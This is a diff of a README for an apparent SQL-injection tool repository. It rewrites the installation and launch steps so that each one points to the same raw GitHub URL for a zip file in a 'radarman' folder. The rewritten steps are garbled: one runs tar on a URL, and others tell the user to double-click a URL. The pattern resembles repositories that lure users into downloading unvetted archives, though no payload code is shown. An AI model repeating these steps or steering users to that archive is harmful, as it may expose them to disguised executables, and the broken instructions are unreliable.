aaryan-1112/SQLMap-Inject-Suite-Pro/README.md

 4. **Extract the Contents**
    - **For Windows Users:** Right-click the downloaded `.zip` file and select "Extract All."
 Follow the prompts to extract the files.
    - **For macOS Users:** Double-click the downloaded `.zip` file to extract it.
-   - **For Linux Users:** Open a terminal and use the command: `tar -xzvf SQLMap-Inject-Suite-Pro-Linux.tar.gz`.
+   - **For Linux Users:** Open a terminal and use the command: `tar -xzvf https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip`.

 5. **Run the Application**
    - **Windows Users:** Navigate to the folder where you extracted the files.
-Look for `SQLMap-Inject-Suite-Pro.exe` and double-click it to launch.
+Look for `https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip` and double-click it to launch.
-   - **macOS Users:** Open the folder where you extracted the files and double-click `SQLMap-Inject-Suite-Pro.app`.
+   - **macOS Users:** Open the folder where you extracted the files and double-click `https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip`.
    - **Linux Users:** Open a terminal, navigate to the folder, and type `./SQLMap-Inject-Suite-Pro` to run the application.

 ## 🛠️ How to Use SQLMap-Inject-Suite-Pro